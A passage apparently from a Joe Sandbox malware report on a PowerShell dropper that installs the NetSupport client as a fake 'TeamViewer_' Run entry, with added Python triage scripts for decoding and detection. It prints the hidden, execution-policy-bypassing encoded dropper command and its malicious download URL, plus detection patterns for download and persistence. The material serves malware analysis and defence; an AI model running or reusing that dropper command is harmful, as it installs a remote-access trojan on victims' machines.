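        elif name and "windowstyle".startswith(name):
            flags["window_style"], i = nxt, i + 1
        i += 1
    return flags

# Behaviours worth flagging in a decoded stage, as (label, regex).
TECHNIQUE_PATTERNS = [
    ("bits_download", r"Start-BitsTransfer"), ("archive_extract", r"Expand-Archive"),
    ("hidden_attribute", r"attributes\s*=\s*'Hidden'"), ("random_names", r"Get-Random"),
    ("run_key_persistence", r"New-ItemProperty[^;]*CurrentVersion\\Run"), ("self_cleanup", r"Remove-Item"),
]

def extract_iocs(script):
    """Indicators to pivot on; a $variable -Name argument resolves to its literal prefix (random suffix dropped)."""
    literals = dict(re.findall(r"\$(\w+)='([^']*)'", script))
    name_arg = re.search(r"New-ItemProperty[^;]*-Name\s+(\S+)", script, re.I)
    run_name = name_arg.group(1).rstrip(";") if name_arg else ""
    return {
        "urls": re.findall(r"https?://[^\s'\";]+", script),
        "run_keys": re.findall(r"HK(?:CU|LM):\\[^'\"]*\\Run(?:Once)?", script, re.I),
        "launched": re.findall(r"\bstart(?:-process)?\s+([\w.-]+\.exe)", script, re.I),
        "run_value_prefix": literals.get(run_name[1:]) if run_name.startswith("$") else run_name.strip("'"),
        "staging_env_vars": sorted({m.lower() for m in re.findall(r"\$env:(\w+)", script)}),
        "techniques": [label for label, pat in TECHNIQUE_PATTERNS if re.search(pat, script, re.I)],
    }

# The report's signature names reproduced as checks over parsed flags and IOCs.
SIGNATURES = [
    ("Bypasses PowerShell execution policy", lambda f, i: (f["execution_policy"] or "").lower() in ("bypass", "unrestricted")),
    ("Encrypted powershell cmdline option found", lambda f, i: f["encoded_command"] is not None),
    ("Very long command line found", lambda f, i: f["length"] > 1000),
    ("Hidden window requested", lambda f, i: (f["window_style"] or "").lower().startswith("hid")),
    ("Potential dropper URLs found", lambda f, i: bool(i["urls"])),
    ("Run key persistence", lambda f, i: "run_key_persistence" in i["techniques"]),
]

def triage(cmdline):
    flags = parse_powershell_cmdline(cmdline)
    script = decode_ps_command(flags["encoded_command"]) if flags["encoded_command"] else ""
    iocs = extract_iocs(script)
    return {"flags": flags, "script": script, "iocs": iocs,
            "fired": [label for label, check in SIGNATURES if check(flags, iocs)]}

def suspicious_run_value(name, data):
    """HKCU Run check derived from the stage: a 'TeamViewer_<4 digits>' value name, or
    client32.exe (the NetSupport client) launched from a user profile folder."""
    path = data.strip('"').lower()
    return bool(re.match(r"^TeamViewer_\d{4}$", name, re.I)) or (
        path.endswith("\\client32.exe") and "\\appdata\\" in path)

# Child command line rebuilt from the report's flags and decoded script (flags as reported).
SAMPLE_CMDLINE = ('"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
                  "-nop -ep bypass -win hid -enc " + encode_ps_command(DECODED_SCRIPT))
SAMPLE_RUN_VALUES = [  # constructed for illustration, not taken from the report
    ("TeamViewer", r"C:\Program Files\TeamViewer\TeamViewer.exe"),
    ("TeamViewer_4821", r"C:\Users\user\AppData\Roaming\TeamViewer_4821\client32.exe"),
]

if __name__ == "__main__":
    print(triage(SAMPLE_CMDLINE)["fired"])
    print([(n, suspicious_run_value(n, d)) for n, d in SAMPLE_RUN_VALUES])
```

Two practical points this makes concrete. First, re-encoding the decoded script yields the same prefix as the -enc string in the report (YwBkACAAJABlAG4AdgA6...), which is the check to run before trusting a sandbox's decode; the lower-cased copy of the command line that some log pipelines emit cannot be decoded at all, because base64 is case-sensitive. Second, -ep bypass only changes the policy for that one process, so execution policy is not a control that stopped anything here; the durable artefacts to hunt are the HKCU Run value named TeamViewer_ followed by four digits and the hidden %APPDATA%\TeamViewer_<n> folder holding client32.exe.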
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation (5 events)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation (13 events)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation (2 events)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation (2 events)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation (3 events)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformation (3 events)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation (2 events)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
MITRE ATT&CK Matrix

One line per tactic. Techniques matched by the sample's signatures carry the report's count badge in square brackets, reproduced as printed (e.g. [11], [21]); techniques without a badge are the unmatched cells of the matrix template.

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Command and Scripting Interpreter [11]; PowerShell [2]; At (Linux); At (Windows); Cron; Launchd
Persistence: Registry Run Keys / Startup Folder [1]; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common
Privilege Escalation: Process Injection [11]; Registry Run Keys / Startup Folder [1]; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common
Defense Evasion: Masquerading [1]; Virtualization/Sandbox Evasion [21]; Process Injection [11]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [1]; Steganography
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Security Software Discovery [1]; Process Discovery [1]; Virtualization/Sandbox Evasion [21]; Application Window Discovery [1]; File and Directory Discovery [2]; System Information Discovery [11]
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Archive Collected Data [1]; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Command and Control: Encrypted Channel [1]; Junk Data; Steganography; Protocol Impersonation; Fallback Channels; Multiband Communication
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features
Impact: Modify System Partition; Device Lockout; Delete Device Data
Antivirus, Machine Learning and Genetic Malware Detection

Initial sample

Source                 Detection  Scanner
6471bc8dac218.ps1      0%         ReversingLabs
6471bc8dac218.ps1      5%         Virustotal

Dropped files, unpacked PE files and domains: No Antivirus matches (all three tables empty).

URLs (the strings http://crl.micro and https://go.micro are truncated exactly as they were recovered from process memory)

Source                                  Detection  Scanner          Label
http://crl.micro                        0%         URL Reputation   safe
http://crl.micro                        0%         URL Reputation   safe
http://pesterbdd.com/images/Pester.png  0%         URL Reputation   safe
https://go.micro                        0%         URL Reputation   safe
https://contoso.com/                    0%         URL Reputation   safe
https://contoso.com/License             0%         URL Reputation   safe
https://contoso.com/Icon                0%         URL Reputation   safe
https://figocoin.it/auth.php            18%        Virustotal
https://figocoin.it/auth.php            100%       Avira URL Cloud  malware
No contacted domains info
URLs found in process memory (Name; Source memory dump; Malicious; Antivirus Detection; Reputation)

http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000002.00000002.431032973.0000023CA3922000.00000004.00000800.00020000.00000000.sdmp
    Malicious: false; Antivirus detection: none listed; Reputation: high
http://crl.micro
    Source: powershell.exe, 00000002.00000003.410792964.0000023CABB97000.00000004.00000020.00020000.00000000.sdmp
    Malicious: false; Antivirus detection: URL Reputation: safe (listed twice); Reputation: unknown
http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000002.00000002.413701569.0000023C93AB9000.00000004.00000800.00020000.00000000.sdmp
    Malicious: false; Antivirus detection: URL Reputation: safe; Reputation: unknown
http://schemas.xmlsoap.org/soap/encoding/
    Source: powershell.exe, 00000002.00000002.413701569.0000023C93AB9000.00000004.00000800.00020000.00000000.sdmp
    Malicious: false; Antivirus detection: none listed; Reputation: high
http://www.apache.org/licenses/LICENSE-2.0.html
    Source: powershell.exe, 00000002.00000002.413701569.0000023C93AB9000.00000004.00000800.00020000.00000000.sdmp
    Malicious: false; Antivirus detection: none listed; Reputation: high
https://figocoin.it/auth.php
    Source: powershell.exe, 00000002.00000002.413701569.0000023C93AB9000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000002.00000002.413701569.0000023C938B1000.00000004.00000800.00020000.00000000.sdmp
    Malicious: false (report column value); Antivirus detection: 18%, Virustotal; Avira URL Cloud: malware; Reputation: unknown
https://go.micro
    Source: powershell.exe, 00000002.00000002.413701569.0000023C94DB3000.00000004.00000800.00020000.00000000.sdmp
    Malicious: false; Antivirus detection: URL Reputation: safe; Reputation: unknown
http://schemas.xmlsoap.org/wsdl/
    Source: powershell.exe, 00000002.00000002.413701569.0000023C93AB9000.00000004.00000800.00020000.00000000.sdmp
    Malicious: false; Antivirus detection: none listed; Reputation: high
https://contoso.com/
    Source: powershell.exe, 00000002.00000002.431032973.0000023CA3922000.00000004.00000800.00020000.00000000.sdmp
    Malicious: false; Antivirus detection: URL Reputation: safe; Reputation: unknown
https://nuget.org/nuget.exe
    Source: powershell.exe, 00000002.00000002.431032973.0000023CA3922000.00000004.00000800.00020000.00000000.sdmp
    Malicious: false; Antivirus detection: none listed; Reputation: high
https://contoso.com/License
    Source: powershell.exe, 00000002.00000002.431032973.0000023CA3922000.00000004.00000800.00020000.00000000.sdmp
    Malicious: false; Antivirus detection: URL Reputation: safe; Reputation: unknown
https://contoso.com/Icon
    Source: powershell.exe, 00000002.00000002.431032973.0000023CA3922000.00000004.00000800.00020000.00000000.sdmp
    Malicious: false; Antivirus detection: URL Reputation: safe; Reputation: unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000000.00000002.457788771.00000220DEC71000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000002.00000002.413701569.0000023C938B1000.00000004.00000800.00020000.00000000.sdmp
    Malicious: false; Antivirus detection: none listed; Reputation: high
https://github.com/Pester/Pester
    Source: powershell.exe, 00000002.00000002.413701569.0000023C93AB9000.00000004.00000800.00020000.00000000.sdmp
    Malicious: false; Antivirus detection: none listed; Reputation: high
                No contacted IP infos
Joe Sandbox Version: 37.1.0 Beryl
Analysis ID: 876993
Start date and time: 2023-05-28 09:30:17 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 5m 52s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample file name: 6471bc8dac218.ps1
Detection: MAL
Classification: mal72.troj.evad.winPS1@4/8@0/0
EGA Information:
  • Successful, ratio: 50%
HDC Information: Failed
HCA Information:
  • Successful, ratio: 93%
  • Number of executed functions: 17
  • Number of non-executed functions: 4
Cookbook Comments:
  • Found application associated with file extension: .ps1
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe
  • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com, figocoin.it (the latter is the URL flagged as malware in the scan results above; no traffic to it appears anywhere in this report)
  • Execution Graph export aborted for target powershell.exe, PID 2220 because it is empty
  • Not all processes were analyzed, report is missing behavior information
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
  • Report size getting too big, too many NtReadFile calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.
Timeline

Time      Type             Description
09:32:03  API Interceptor  97x Sleep call for process: powershell.exe modified
09:32:25  Autostart        Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run, value TeamViewer_3533 = C:\Users\user\AppData\Roaming\TeamViewer_3533\client32.exe
09:32:34  Autostart        Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run, value TeamViewer_3533 = C:\Users\user\AppData\Roaming\TeamViewer_3533\client32.exe
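The two Autostart events above are the persistence artefact of this sample: a Run value named after TeamViewer that launches client32.exe (the NetSupport Manager client, hence the netsupport tag) from the user's roaming profile. The script below is an added example, not part of the Joe Sandbox report: it parses such timeline lines and scores them so that a user-writable path alone (common for benign updaters) does not trip the alarm, while the RAT binary name and the product/binary mismatch do. The user-writable directory list, the product-to-binary mapping, the weights and the third (OneDrive) line are the author's assumptions.

```python
import re
from dataclasses import dataclass, field

# Constructed input: the two Autostart lines copied verbatim from the
# timeline above, plus one constructed benign entry for contrast.
TIMELINE = [
    r"09:32:25AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run TeamViewer_3533 C:\Users\user\AppData\Roaming\TeamViewer_3533\client32.exe",
    r"09:32:34AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run TeamViewer_3533 C:\Users\user\AppData\Roaming\TeamViewer_3533\client32.exe",
    r"09:40:00AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run OneDrive C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background",
]

EVENT_RE = re.compile(
    r"^(?P<time>\d\d:\d\d:\d\d)\s*Autostart\s*Run:\s+(?P<key>\S+)\s+(?P<name>\S+)\s+(?P<data>.+)$"
)

# Assumptions, not taken from the report: directories a non-admin user can
# write to, one well-known RAT binary name, and the binaries a product name
# is expected to launch.
USER_WRITABLE = ("\\appdata\\roaming\\", "\\appdata\\local\\", "\\temp\\",
                 "\\programdata\\", "\\users\\public\\")
KNOWN_RAT_BINARIES = {"client32.exe": "NetSupport Manager client (NetSupport RAT)"}
PRODUCT_BINARIES = {"teamviewer": {"teamviewer.exe", "teamviewer_service.exe"}}


@dataclass
class RunEntry:
    time: str
    key: str
    name: str
    image: str
    score: int = 0
    reasons: list = field(default_factory=list)


def parse_event(line):
    """Turn one 'Autostart Run:' timeline line into a RunEntry (or None)."""
    m = EVENT_RE.match(line)
    if not m:
        return None
    data = m.group("data").strip()
    # The image path is either a quoted string or the first token.
    image = data[1:data.index('"', 1)] if data.startswith('"') else data.split()[0]
    return RunEntry(m.group("time"), m.group("key"), m.group("name"), image)


def assess(entry):
    """Attach weak and strong indicators; the weights are the author's choice."""
    low = entry.image.lower()
    parts = low.split("\\")
    exe, parent = parts[-1], (parts[-2] if len(parts) >= 2 else "")
    if any(marker in low for marker in USER_WRITABLE):
        entry.score += 1                      # weak: benign updaters live here too
        entry.reasons.append("image lives in a user-writable directory")
    if exe in KNOWN_RAT_BINARIES:
        entry.score += 3                      # strong: known RAT client binary
        entry.reasons.append(f"{exe} is the {KNOWN_RAT_BINARIES[exe]}")
    for product, binaries in PRODUCT_BINARIES.items():
        claims = entry.name.lower().startswith(product) or parent.startswith(product)
        if claims and exe not in binaries:
            entry.score += 2                  # masquerading: name says X, binary is Y
            entry.reasons.append(f"value/folder claims to be {product} but launches {exe}")
    return entry


def triage(lines):
    """Parse and score every Autostart line; unparseable lines are skipped."""
    return [assess(e) for e in map(parse_event, lines) if e is not None]


def suspicious(lines, threshold=3):
    """Entries at or above the threshold; a user-writable path alone is not enough."""
    return [e for e in triage(lines) if e.score >= threshold]


if __name__ == "__main__":
    for e in triage(TIMELINE):
        print(e.time, e.name, e.score, "; ".join(e.reasons))
```

Both report entries score 6 (user-writable path, RAT binary, TeamViewer name with a non-TeamViewer image) and the constructed OneDrive entry scores 1, so only the two real ones cross the threshold.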
Dropped files (all written by C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; none flagged malicious)

File 1
    File Type: data; Category: dropped; Size (bytes): 24349; Entropy (8bit): 5.044789539417162; Encrypted: false
    SSDEEP: 384:1fib4GxVoGIpN6KQkj2Akjh4iUxGz75ard3GnaOdBQtAHkoNXp5XNSSmebvOjJEm:1IxV3IpNBQkj25h4iUxGz75ard3GnaOQ
    MD5: 4CE762BE063FD056F19DFE6020C1C756
    SHA1: 49898445B83E8FE02CCC1E2ACD47130CA237CC85
    SHA-256: E902C6A8B5ECD8371795819B77445FC3C233B1FA7FC423F97FD52F13EF394049
    SHA-512: 699D2F7CC17E60B40C3DFC836AE6989E39DDF439A4ACA8A00EEF36CB028AEFFE8B88B545D6E50112B1C60AD78CCB5F26E27C3ADA1261967A873F26D418693FC2
    Malicious: false; Reputation: moderate, very likely benign file
    Preview (a PSMODULECACHE module-analysis cache listing exported commands of DirectAccessClientComponents and PowerShellGet): PSMODULECACHE.%..._t.....q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1........Set-DAEntryPointTableItem....#...Set-DAClientExperienceConfiguration...."...Enable-DAManualEntryPointSelection........Get-DAEntryPointTableItem........Reset-DAEntryPointTableItem....%...Reset-DAClientExperienceConfiguration........Remove-DAEntryPointTableItem........New-DAEntryPointTableItem....#...Get-DAClientExperienceConfiguration....#...Disable-DAManualEntryPointSelection........Rename-DAEntryPointTableItem.........P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScr

File 2
    File Type: data; Category: dropped; Size (bytes): 64; Entropy (8bit): 0.9260988789684415; Encrypted: false
    SSDEEP: 3:Nlllulb/lj:NllUb/l
    MD5: 13AF6BE1CB30E2FB779EA728EE0A6D67
    SHA1: F33581AC2C60B1F02C978D14DC220DCE57CC9562
    SHA-256: 168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
    SHA-512: 1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
    Malicious: false
    Preview: @...e................................................@..........

Files 3 to 6 (four identical files; the hashes are those of the single ASCII character "1")
    File Type: very short file (no magic); Category: dropped; Size (bytes): 1; Entropy (8bit): 0.0; Encrypted: false
    SSDEEP: 3:U:U
    MD5: C4CA4238A0B923820DCC509A6F75849B
    SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
    SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
    SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
    Malicious: false
    Preview: 1

Files 7 and 8 (two identical files; the preview holds shell item fragments for AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell and a WINDOW~1.LNK entry)
    File Type: data; Category: dropped; Size (bytes): 6205; Entropy (8bit): 3.758665470157352; Encrypted: false
    SSDEEP: 96:InyFoCrQ51pkvhkvCCtrF5ceVHLi5ceVHL1:5FL4FBydyg
    MD5: F77BFC3C8EFAB9840E4637A510E43069
    SHA1: 929F6DACBBB2803007A5B78CA136CD6A0DC7C03D
    SHA-256: 37D801F2B797E9BF18EF6C37B39E3CE37E7E628F55B158B658AC9F4529798026
    SHA-512: 187E8CF1C63E1A49B3C208BD55117DAB5EAB4B2DE0A467D523A59FB2C192F8A51D3AF7F9379F514C071CFCA0B9ACD9945692A38590C5272A0E6D523B6DB30951
    Malicious: false
    Preview: ...................................FL..................F.".. ...N....-..;yz(.a..\.................................:..DG..Yr?.D..U..k0.&...&...........-..0........;.......t...CFSF..1......Nz...AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......Ny..V.......Y....................f.(.A.p.p.D.a.t.a...B.V.1......Nz...Roaming.@.......Ny..V.......Y....................D1,.R.o.a.m.i.n.g.....\.1......U...MICROS~1..D.......Ny..V.......Y....................b5..M.i.c.r.o.s.o.f.t.....V.1......U....Windows.@.......Ny..U.......Y.......................W.i.n.d.o.w.s.......1......N{...STARTM~1..n.......Ny..U.......Y..............D.......0.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......P.q..Programs..j.......Ny..U.......Y..............@........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......L...WINDOW~1..V.......Ny..U.......Y....................T_..W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......L.. .WINDOW~1.LNK..^.......Ny..P.......Y..........
Static File Info

File type: Unicode text, UTF-8 (with BOM) text, with very long lines (2189)
Entropy (8bit): 4.334806861450021
TrID:
  • Text - UTF-8 encoded (3003/1) 100.00%
File name: 6471bc8dac218.ps1
File size: 2219
MD5: 12838e82541973a0e63820a421d4b8f6
SHA1: 6cca7441a420f3d3082f6787abeb6c5a6d9ae99b
SHA256: b146dd7f30d4ed7536f62fae414f34f45ca32173224ad3b4bc0a14651108b1ba
SHA512: 76af3fc336e9cc393ec1d978c62a5cb7be762c024c21038936e56c526a574495f168ea53d2229ff2304652f0866b873521119be06c714f313f0e3b2ea91d340f
SSDEEP: 48:LGfEFWuJqs9HZNjd+SfprcKyK0hE6S1FtfsC5P3RX5ZWiaoIhSNtV:LGfEFW87jd+Sfpbaq6S1FtfsC5P39Efs
TLSH: A741CB7CCF69F8E0033DB0A088492E2620949E57D6B58E24D9574EE62D7C20ACF2B18C
File Content Preview (the leading dots are the UTF-8 BOM; the base64 is cut off by the preview): ...powershell -nop -ep bypass -win hid -enc YwBkACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAOwAgACQAbABpAG4AawA9ACcAaAB0AHQAcABzADoALwAvAGYAaQBnAG8AYwBvAGkAbgAuAGkAdAAvAGEAdQB0AGgALgBwAGgAcAAnADsAIAAkAHIAbgB1AG0APQBHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBtAGkAbgBpAG0AdQB
Icon Hash: 3270d6baae77db44
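The File Content Preview above is the whole dropper: a single powershell -nop -ep bypass -win hid -enc line whose argument is the real script encoded as base64 over UTF-16LE, which is what the "Encrypted powershell cmdline option found" and "Very long command line found" signatures react to. The script below is an added example, not part of the Joe Sandbox report: it pulls the -EncodedCommand argument out of such a command line, decodes it (re-padding the blob, because the preview is truncated, so the decoded text also stops mid-token), extracts URLs from the result and lists the switches that make the invocation suspicious. The base64 is copied from the preview without the BOM; the switch patterns and indicator names are the author's.

```python
import base64
import re

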